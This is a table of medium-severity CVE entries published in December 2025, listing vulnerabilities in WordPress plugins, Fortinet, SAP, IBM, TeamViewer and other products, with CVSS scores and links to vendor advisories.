| n/a--@tiptap/extension-link | Versions of the package @tiptap/extension-link before 2.10.4 are vulnerable to Cross-site Scripting (XSS) due to unsanitized user input allowed in setting or toggling links. An attacker can execute arbitrary JavaScript code in the context of the application by injecting a javascript: URL payload into these attributes, which is then triggered either by user interaction. | 2025-12-09 | 6.1 | CVE-2025-14284 | https://security.snyk.io/vuln/SNYK-JS-TIPTAPEXTENSIONLINK-14222197 https://gist.github.com/th4s1s/3d1b6cd3e7257b14947242f712ec6e1f https://github.com/ueberdosis/tiptap/commit/1c2fefe3d61ab1c8fbaa6d6b597251e1b6d9aaed https://github.com/ueberdosis/tiptap/releases/tag/v2.10.4 |
| wpjobportal--WP Job Portal AI-Powered Recruitment System for Company or Job Board website | The WP Job Portal plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.4.0 via the 'downloadCustomUploadedFile' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-12-11 | 6.5 | CVE-2025-14293 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6dfcd264-39e3-44af-8e0e-5c35734524d0?source=cve https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/modules/customfield/model.php#L908 |
| awanhrp--Wpik WordPress Basic Ajax Form | The Wpik WordPress Basic Ajax Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'dname' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14393 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1bc6508b-f646-4d52-bc8d-bdac443ed2fe?source=cve https://plugins.trac.wordpress.org/browser/wpik-wordpress-basic-ajax-form/tags/1.0/index.php#L84 https://plugins.trac.wordpress.org/browser/wpik-wordpress-basic-ajax-form/tags/1.0/index.php#L85 https://plugins.trac.wordpress.org/browser/wpik-wordpress-basic-ajax-form/tags/1.0/index.php#L107 https://developer.wordpress.org/plugins/security/data-validation/ https://developer.wordpress.org/plugins/security/securing-output/ https://cwe.mitre.org/data/definitions/79.html |
| ghozylab--Popup Builder | The Popup Builder (Easy Notify Lite) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the easynotify_cp_reset() function in all versions up to, and including, 1.1.37. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset plugin settings to their default values. | 2025-12-13 | 6.5 | CVE-2025-14446 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f67ab0cf-340d-4234-a857-1883f91c3ab6?source=cve https://plugins.trac.wordpress.org/browser/easy-notify-lite/trunk/inc/functions/enoty-functions.php#L304 https://plugins.trac.wordpress.org/browser/easy-notify-lite/tags/1.1.37/inc/functions/enoty-functions.php#L304 |
| yalogica--MediaCommander Bring Folders to Media, Posts, and Pages | The MediaCommander - Bring Folders to Media, Posts, and Pages plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the import-csv REST API endpoint in all versions up to, and including, 2.3.1. This is due to the endpoint using `upload_files` capability check (Author level) for a destructive operation that can delete all folders. This makes it possible for authenticated attackers, with Author-level access and above, to delete all folder organization data created by Administrators and other users. | 2025-12-13 | 6.5 | CVE-2025-14508 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9102fe7e-7baa-4bc0-879f-cc7df1ea13d2?source=cve https://plugins.trac.wordpress.org/browser/mediacommander/trunk/includes/Rest/Controllers/FoldersController.php#L127 https://plugins.trac.wordpress.org/browser/mediacommander/trunk/includes/Models/FoldersModel.php#L793 https://plugins.trac.wordpress.org/changeset/3417928/ |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in glib. This vulnerability allows a heap buffer overflow and denial-of-service (DoS) via an integer overflow in GLib's GIO (GLib Input/Output) escape_byte_string() function when processing malicious file or remote filesystem attribute values. | 2025-12-11 | 6.5 | CVE-2025-14512 | https://access.redhat.com/security/cve/CVE-2025-14512 RHBZ#2421339 |
| Yalantis--uCrop | A vulnerability was found in Yalantis uCrop 2.2.11. Affected by this issue is the function downloadFile of the file com.yalantis.ucrop.task.BitmapLoadTask.java of the component URL Handler. Performing manipulation results in server-side request forgery. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 6.3 | CVE-2025-14516 | VDB-335854 | Yalantis uCrop URL com.yalantis.ucrop.task.BitmapLoadTask.java downloadFile server-side request forgery VDB-335854 | CTI Indicators (IOB, IOC, IOA) Submit #702810 | uCrop Android Library 2.2.11 Server-Side Request Forgery https://mesquite-dream-86b.notion.site/uCrop-Library-SSRF-and-Intent-Spoofing-2b8512562197804dae69edf96b942446 https://mesquite-dream-86b.notion.site/uCrop-Library-SSRF-and-Intent-Spoofing-2b8512562197804dae69edf96b942446?pvs=25#039fe30a92dc4ed88c9b03f85418e92e |
| n/a--PowerJob | A vulnerability was identified in PowerJob up to 5.1.2. This vulnerability affects the function checkConnectivity of the file src/main/java/tech/powerjob/common/utils/net/PingPongUtils.java of the component Network Request Handler. The manipulation of the argument targetIp/targetPort leads to server-side request forgery. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-12-11 | 6.3 | CVE-2025-14518 | VDB-335856 | PowerJob Network Request PingPongUtils.java checkConnectivity server-side request forgery VDB-335856 | CTI Indicators (IOB, IOC, IOA) Submit #702896 | PoweJob PowerJob <=5.1.2 SSRF https://github.com/PowerJob/PowerJob/issues/1144 https://github.com/PowerJob/PowerJob/issues/1144#issue-3673393002 |
| baowzh--hfly | A vulnerability was detected in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. The impacted element is an unknown function of the file /Public/Kindeditor/php/upload_json.php. Performing manipulation of the argument imgFile results in unrestricted upload. It is possible to initiate the attack remotely. The exploit is now public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 6.3 | CVE-2025-14522 | VDB-335860 | baowzh hfly upload_json.php unrestricted upload VDB-335860 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702950 | GitHub hfly 1.0 Stored Cross-Site Scripting https://github.com/Xor-Gerke/webray.com.cn/blob/main/cve/PHP-based%20travel%20website-CMS/PHP-based%20travel%20website-CMS%20upload_json.php%20imgFile%20XSS-File-Upload.md |
| haxxorsid--Stock-Management-System | A security vulnerability has been detected in haxxorsid Stock-Management-System up to fbbbf213e9c93b87183a3891f77e3cc7095f22b0. This impacts an unknown function of the file model/User.php. The manipulation of the argument employee_id/id/admin leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-12 | 6.3 | CVE-2025-14568 | VDB-336192 | haxxorsid Stock-Management-System User.php sql injection VDB-336192 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703880 | haxxorsid stock-management-system 1.0 SQL Injection https://github.com/ixpqxi/CVE_LIST/blob/master/stock_management_system/sql_injection_vulnerability.md |
| TOTOLINK--X5000R | A vulnerability was determined in TOTOLINK X5000R 9.1.0cu.2089_B20211224. Affected by this issue is the function snprintf of the file /cgi-bin/cstecgi.cgi?action=exportOvpn&type=user. This manipulation of the argument User causes os command injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-12-13 | 6.3 | CVE-2025-14586 | VDB-336206 | TOTOLINK X5000R cstecgi.cgi snprintf os command injection VDB-336206 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705593 | TOTOLINK X5000R v9.1.0cu.2089_B20211224 RCE https://github.com/awigwu76/TOTOLINK_X5000R/blob/main/1.md https://www.totolink.net/ |
| code-projects--Prison Management System | A weakness has been identified in code-projects Prison Management System 2.0. This issue affects some unknown processing of the file /admin/search.php. Executing manipulation of the argument keyname can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be exploited. | 2025-12-13 | 6.3 | CVE-2025-14589 | VDB-336209 | code-projects Prison Management System search.php sql injection VDB-336209 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707094 | Yunlin: code-projects Prison Management System 2.0 SQL Injection https://github.com/asd1238525/cve/blob/main/SQL18.md https://code-projects.org/ |
| OFFIS--DCMTK | A vulnerability was detected in OFFIS DCMTK up to 3.6.9. Affected by this issue is the function DcmByteString::makeDicomByteString of the file dcmdata/libsrc/dcbytstr.cc of the component dcmdata. The manipulation results in memory corruption. The attack can be launched remotely. Upgrading to version 3.7.0 can resolve this issue. The patch is identified as 4c0e5c10079392c594d6a7abd95dd78ac0aa556a. You should upgrade the affected component. | 2025-12-13 | 6.3 | CVE-2025-14607 | VDB-336283 | OFFIS DCMTK dcmdata dcbytstr.cc makeDicomByteString memory corruption VDB-336283 | CTI Indicators (IOB, IOC, IOA) Submit #705036 | OFFIS DCMTK 3.6.9 Buffer Overflow https://support.dcmtk.org/redmine/issues/1184 https://support.dcmtk.org/redmine/projects/dcmtk/activity?from=2025-12-02 https://github.com/DCMTK/dcmtk/commit/4c0e5c10079392c594d6a7abd95dd78ac0aa556a https://support.dcmtk.org/redmine/versions/19 |
| aizuda--snail-job | A vulnerability was found in aizuda snail-job up to 1.6.0. Affected by this vulnerability is the function QLExpressEngine.doEval of the file snail-job-common/snail-job-common-core/src/main/java/com/aizuda/snailjob/common/core/expression/strategy/QLExpressEngine.java. The manipulation results in injection. The attack can be launched remotely. Upgrading to version 1.7.0-beta1 addresses this issue. The patch is identified as 978f316c38b3d68bb74d2489b5e5f721f6675e86. The affected component should be upgraded. | 2025-12-14 | 6.3 | CVE-2025-14674 | VDB-336403 | aizuda snail-job QLExpressEngine.java QLExpressEngine.doEval injection VDB-336403 | CTI Indicators (IOB, IOC, TTP, IOA) https://gitee.com/aizuda/snail-job/issues/ICNUG0 https://gitee.com/aizuda/snail-job/issues/ICNUG0#note_44321424_link https://gitee.com/aizuda/snail-job/commit/978f316c38b3d68bb74d2489b5e5f721f6675e86 https://gitee.com/aizuda/snail-job/releases/tag/vsj1.7.0-beta1 |
| Infinera--MTC-9 | Improper input validation in the Netconf service in Infinera MTC-9 allows remote authenticated users to crash the service and reboot the appliance, thus causing a DoS condition, via crafted XML payloads. This issue affects MTC-9: from R22.1.1.0275 before R23.0. | 2025-12-08 | 6.5 | CVE-2025-26489 | https://www.cve.org/CVERecord?id=CVE-2025-26489 |
| IBM--Controller | IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 could allow an authenticated user to cause a denial of service due to improper validation of a specified quantity size input. | 2025-12-08 | 6.5 | CVE-2025-36015 | https://www.ibm.com/support/pages/node/7253273 |
| IBM--Controller | IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 stores unencrypted sensitive information in environmental variables files which can be obtained by an authenticated user. | 2025-12-08 | 6.5 | CVE-2025-36017 | https://www.ibm.com/support/pages/node/7253283 |
| IBM--watsonx.data | IBM watsonx.data 2.2 through 2.2.1 could allow an authenticated user to cause a denial of service through ingestion pods due to improper allocation of resources without limits. | 2025-12-08 | 6.5 | CVE-2025-36140 | https://www.ibm.com/support/pages/node/7253932 |
| Siemens--Gridscale X Prepay | A vulnerability has been identified in Gridscale X Prepay (All versions < V4.2.1). The affected application is vulnerable to capture-replay of authentication tokens. This could allow an authenticated but already locked-out user to establish still valid user sessions. | 2025-12-09 | 6.3 | CVE-2025-40807 | https://cert-portal.siemens.com/productcert/html/ssa-356310.html |
| Siemens--SINEC Security Monitor | A vulnerability has been identified in SINEC Security Monitor (All versions < V4.10.0). The affected application does not have proper authorization checks for the file_transfer feature in ssmctl-client command. This could allow an authenticated, lowly privileged local attacker to read or write to any file on server or sensor. | 2025-12-09 | 6.7 | CVE-2025-40830 | https://cert-portal.siemens.com/productcert/html/ssa-882673.html |
| Siemens--SINEC Security Monitor | A vulnerability has been identified in SINEC Security Monitor (All versions < V4.10.0). The affected application lacks input validation of date parameter in report generation functionality. This could allow an authenticated, lowly privileged attacker to cause denial of service condition of the report functionality. | 2025-12-09 | 6.5 | CVE-2025-40831 | https://cert-portal.siemens.com/productcert/html/ssa-882673.html |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 11.10 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to cause a denial of service condition by uploading specially crafted images. | 2025-12-11 | 6.5 | CVE-2025-4097 | GitLab Issue #538192 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| Phoenix Contact--FL SWITCH 2005 | A high privileged remote attacker with admin privileges for the webUI can brute-force the "root" and "user" passwords of the underlying OS due to a weak password generation algorithm. | 2025-12-09 | 6.8 | CVE-2025-41692 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | A low privileged remote attacker can run the webshell with an empty command containing whitespace. The server will then block until it receives more data, resulting in a DoS condition of the websserver. | 2025-12-09 | 6.5 | CVE-2025-41694 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An attacker can use an undocumented UART port on the PCB as a side-channel to get root access e.g. with the credentials obtained from CVE-2025-41692. | 2025-12-09 | 6.8 | CVE-2025-41697 | https://certvde.com/de/advisories/VDE-2025-071 |
| SAP_SE--SAP NetWeaver Enterprise Portal | Due to a Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal, an unauthenticated attacker could inject malicious scripts that execute in the context of other users� browsers, allowing the attacker to steal session cookies, tokens, and other sensitive information. As a result, the vulnerability has a low impact on confidentiality and integrity and no impact on availability. | 2025-12-09 | 6.1 | CVE-2025-42872 | https://me.sap.com/notes/3662622 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP NetWeaver Internet Communication Framework | The SAP Internet Communication Framework does not conduct any authentication checks for features that need user identification allowing an attacker to reuse authorization tokens, violating secure authentication practices causing low impact on Confidentiality, Integrity and Availability of the application. | 2025-12-09 | 6.6 | CVE-2025-42875 | https://me.sap.com/notes/3591163 https://url.sap/sapsecuritypatchday |
| SAP_SE--Application Server ABAP | Due to an Information Disclosure vulnerability in Application Server ABAP, an authenticated attacker could read unmasked values displayed in ABAP Lists. Successful exploitation could lead to unauthorized disclosure of data, resulting in a high impact on confidentiality without affecting integrity or availability. | 2025-12-09 | 6.5 | CVE-2025-42904 | https://me.sap.com/notes/3662324 https://url.sap/sapsecuritypatchday |
| Dell--Dell Encryption | Dell Encryption, versions prior to 11.12.1, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering. | 2025-12-09 | 6.6 | CVE-2025-46636 | https://www.dell.com/support/kbdoc/en-us/000394657/dsa-2025-442 |
| Fortinet--FortiSandbox Cloud | An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiSandbox version 5.0.0 through 5.0.2 and before 4.4.7 GUI allows a remote privileged attacker to execute unauthorized code or commands via crafted HTTP or HTTPS requests. | 2025-12-09 | 6.9 | CVE-2025-53679 | https://fortiguard.fortinet.com/psirt/FG-IR-25-454 |
| Fortinet--FortiPortal | An Incorrect Authorization vulnerability [CWE-863] in FortiPortal 7.4.0 through 7.4.5 may allow an authenticated attacker to reboot a shared FortiGate device via crafted HTTP requests. | 2025-12-09 | 6.4 | CVE-2025-54838 | https://fortiguard.fortinet.com/psirt/FG-IR-25-032 |
| Fortinet--FortiSOAR on-premise | An unverified password change vulnerability [CWE-620] vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.2, FortiSOAR PaaS 7.5.0 through 7.5.1, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an attacker who has already gained access to a victim's user account to reset the account credentials without being prompted for the account's password | 2025-12-09 | 6.5 | CVE-2025-59808 | https://fortiguard.fortinet.com/psirt/FG-IR-25-599 |
| Fortinet--FortiSOAR on-premise | An improper access control vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.2, FortiSOAR PaaS 7.5.0 through 7.5.1, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow information disclosure to an authenticated attacker via crafted requests | 2025-12-09 | 6.2 | CVE-2025-59810 | https://fortiguard.fortinet.com/psirt/FG-IR-25-601 |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and data on the server. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 6.8 | CVE-2025-61821 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system write. An attacker could exploit this vulnerability to write malicious files to arbitrary locations on the file system. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 6.2 | CVE-2025-61822 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. A high privileged attacker could exploit this vulnerability to access sensitive files and data on the server. Exploitation of this issue requires user interaction and scope is changed. | 2025-12-09 | 6.2 | CVE-2025-61823 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Microsoft--Windows Server 2022 | Null pointer dereference in Windows DirectX allows an authorized attacker to deny service locally. | 2025-12-09 | 6.5 | CVE-2025-62463 | DirectX Graphics Kernel Denial of Service Vulnerability |
| Microsoft--Windows Server 2022 | Null pointer dereference in Windows DirectX allows an authorized attacker to deny service locally. | 2025-12-09 | 6.5 | CVE-2025-62465 | DirectX Graphics Kernel Denial of Service Vulnerability |
| Microsoft--Windows 10 Version 1809 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. | 2025-12-09 | 6.5 | CVE-2025-62473 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability |
| Fortinet--FortiExtender | A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiExtender 7.6.0 through 7.6.3, FortiExtender 7.4.0 through 7.4.7, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated attacker to execute unauthorized code or commands via a specific HTTP request. | 2025-12-09 | 6.7 | CVE-2025-64153 | https://fortiguard.fortinet.com/psirt/FG-IR-25-739 |
| Fortinet--FortiVoice | An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7, FortiVoice 6.4 all versions, FortiVoice 6.0 all versions may allow an authenticated privileged attacker to execute unauthorized code or commands via crafted requests | 2025-12-09 | 6.8 | CVE-2025-64156 | https://fortiguard.fortinet.com/psirt/FG-IR-25-362 |
| Enalean--tuleap | Tuleap is an Open Source Suite for management of software development and collaboration. Versions below 17.0.99.1762431347 of Tuleap Community Edition and Tuleap Enterprise Edition below 17.0-2, 16.13-7 and 16.12-10 allow attackers to access file release system information in projects they do not have access to. This issue is fixed in version 17.0.99.1762431347 of the Tuleap Community Edition and versions 17.0-2, 16.13-7 and 16.12-10 of Tuleap Enterprise Edition. | 2025-12-08 | 6.5 | CVE-2025-64497 | https://github.com/Enalean/tuleap/security/advisories/GHSA-v6vm-6rxf-7p2v https://github.com/Enalean/tuleap/commit/403eb69f4cfafe52254c8f9bdbe66e1fedadc254 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=403eb69f4cfafe52254c8f9bdbe66e1fedadc254 https://tuleap.net/plugins/tracker/?aid=45583 |
| IBM--Storage Defender - Resiliency Service | IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.18 could disclose sensitive user credentials in log files. | 2025-12-08 | 6.5 | CVE-2025-64650 | https://www.ibm.com/support/pages/node/7253864 |
| Microsoft--Windows Server 2022 | Exposure of sensitive information to an unauthorized actor in Microsoft Graphics Component allows an authorized attacker to disclose information over a network. | 2025-12-09 | 6.5 | CVE-2025-64670 | Windows DirectX Information Disclosure Vulnerability |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Explorer-TachyonCore-LogoffUser instruction prior V21.1. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 6.8 | CVE-2025-64990 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-PatchInsights-Deploy instruction prior V15. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 6.8 | CVE-2025-64991 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Nomad-PauseNomadJobQueue instruction prior V25. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 6.8 | CVE-2025-64992 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-ConfigMgrConsoleExtensions instructions. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 6.8 | CVE-2025-64993 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A privilege escalation vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Nomad-SetWorkRate instruction prior V17.1. The improper handling of executable search paths could allow local attackers with write access to a PATH directory on a device to escalate privileges and execute arbitrary code as SYSTEM. | 2025-12-11 | 6.5 | CVE-2025-64994 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A privilege escalation vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Exchange-NomadClientHealth-ConfigureGeneralSetting instruction prior V3.4. Improper protection of the execution path on the local device allows attackers, with local access to the device during execution, to hijack the process and execute arbitrary code with SYSTEM privileges. | 2025-12-11 | 6.5 | CVE-2025-64995 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| withastro--astro | Astro is a web framework. Versions 5.15.7 and below have a double URL encoding bypass which allows any unauthenticated attacker to bypass path-based authentication checks in Astro middleware, granting unauthorized access to protected routes. While the original CVE-2025-64765 was fixed in v5.15.8, the fix is insufficient as it only decodes once. By using double-encoded URLs, attackers can still bypass authentication and access any route protected by middleware pathname checks. This issue is fixed in version 5.15.8. | 2025-12-08 | 6.5 | CVE-2025-66202 | https://github.com/withastro/astro/security/advisories/GHSA-whqg-ppgf-wp8c https://github.com/withastro/astro/security/advisories/GHSA-ggxq-hp9w-j794 https://github.com/withastro/astro/commit/6f800813516b07bbe12c666a92937525fddb58ce |
| Huawei--HarmonyOS | Permission control vulnerability in the package management module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-12-08 | 6.2 | CVE-2025-66325 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Race condition vulnerability in the audio module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 6.7 | CVE-2025-66326 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Versions 3.3.1 and below are vulnerable to Reflected XSS through its ui.add_css, ui.add_scss, and ui.add_sass functions. The functions lack proper sanitization or encoding for the JavaScript context they generate. An attacker can break out of the intended <style> or <script> tags by injecting closing tags (e.g., </style> or </script>), allowing for the execution of arbitrary JavaScript. This issue is fixed in version 3.4.0. | 2025-12-08 | 6.1 | CVE-2025-66469 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-72qc-wxch-74mg https://github.com/zauberzeug/nicegui/commit/a8fd25b7d5e23afb1952d0f60a1940e18b5f1ca8 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Versions 3.3.1 and below are subject to a XSS vulnerability through the ui.interactive_image component of NiceGUI. The component renders SVG content using Vue's v-html directive without any sanitization. This allows attackers to inject malicious HTML or JavaScript via the SVG <foreignObject> tag whenever the image component is rendered or updated. This is particularly dangerous for dashboards or multi-user applications displaying user-generated content or annotations. This issue is fixed in version 3.4.0. | 2025-12-09 | 6.1 | CVE-2025-66470 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-2m4f-cg75-76w2 https://github.com/zauberzeug/nicegui/commit/58ad0b36e19922de16bbc79ea3ddd29851b1a3e3 |
| 1Panel-dev--1Panel | 1Panel is an open-source, web-based control panel for Linux server management. Versions 2.0.14 and below use Gin's default configuration which trusts all IP addresses as proxies (TrustedProxies = 0.0.0.0/0), allowing any client to spoof the X-Forwarded-For header. Since all IP-based access controls (AllowIPs, API whitelists, localhost-only checks) rely on ClientIP(), attackers can bypass these protections by simply sending X-Forwarded-For: 127.0.0.1 or any whitelisted IP. This renders all IP-based security controls ineffective. This issue is fixed in version 2.0.14. | 2025-12-09 | 6.5 | CVE-2025-66508 | https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-7cqv-qcq2-r765 https://github.com/1Panel-dev/1Panel/commit/94f7d78cc9768ee244da33e09408017d1f68b5ed |
| robrichards--xmlseclibs | xmlseclibs is a library written in PHP for working with XML Encryption and Signatures. Versions 3.1.3 contain an authentication bypass vulnerability due to a flaw in the libxml2 canonicalization process during document transformation. When libxml2's canonicalization is invoked on an invalid XML input, it may return an empty string rather than a canonicalized node. xmlseclibs then proceeds to compute the DigestValue over this empty string, treating it as if canonicalization succeeded. This issue is fixed in version 3.1.4. Workarounds include treating canonicalization failures (exceptions or nil/empty outputs) as fatal and aborting validation, and/or adding explicit checks to reject when canonicalize returns nil/empty or raises errors. | 2025-12-09 | 6 | CVE-2025-66578 | https://github.com/robrichards/xmlseclibs/security/advisories/GHSA-c4cc-x928-vjw9 https://github.com/robrichards/xmlseclibs/commit/69fd63080bc47a8d51bc101c30b7cb756862d1d6 https://github.com/robrichards/xmlseclibs/blob/f4131320c6dcd460f1b0c67f16f8bf24ce4b5c3e/src/XMLSecurityDSig.php#L296 |
| containernetworking--plugins | The CNI portmap plugin allows containers to emulate opening a host port, forwarding that traffic to the container. Versions 1.6.0 through 1.8.0 inadvertently forward all traffic with the same destination port as the host port when the portmap plugin is configured with the nftables backend, thus ignoring the destination IP. This includes traffic not intended for the node itself, i.e. traffic to containers hosted on the node. Containers that request HostPort forwarding can intercept all traffic destined for that port. This requires that the portmap plugin be explicitly configured to use the nftables backend. This issue is fixed in version 1.9.0. To workaround, configure the portmap plugin to use the iptables backend. It does not have this vulnerability. | 2025-12-09 | 6.6 | CVE-2025-67499 | https://github.com/containernetworking/plugins/security/advisories/GHSA-jv3w-x3r3-g6rm https://github.com/containernetworking/plugins/pull/1210 https://github.com/containernetworking/plugins/releases/tag/v1.9.0 |
| Mayuri-Chan--pyrofork | Pyrofork is a modern, asynchronous MTProto API framework. Versions 2.3.68 and earlier do not properly sanitize filenames received from Telegram messages in the download_media method before using them in file path construction. When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. The attribute originates from Telegram's DocumentAttributeFilename and is controlled by the message sender. This issue is fixed in version 2.3.69. | 2025-12-11 | 6.5 | CVE-2025-67720 | https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95 |
| Exim--Exim | Exim before 4.99.1 allows remote heap corruption that will be further described on 2025-12-18. | 2025-12-14 | 6.4 | CVE-2025-67896 | https://www.openwall.com/lists/oss-security/2025/12/11/2 https://exim.org/static/doc/security/ |
| sparklewpthemes--Kingcabs | The Kingcabs theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'progressbarLayout' parameter in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-7058 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7d75851d-4dd5-4fb4-97bc-fc63575e483e?source=cve https://themes.trac.wordpress.org/browser/kingcabs/1.1.9/blocks-extends/blocks/progressbar.php#L44 https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=290354%40kingcabs&new=290354%40kingcabs&sfp_email=&sfph_mail= |
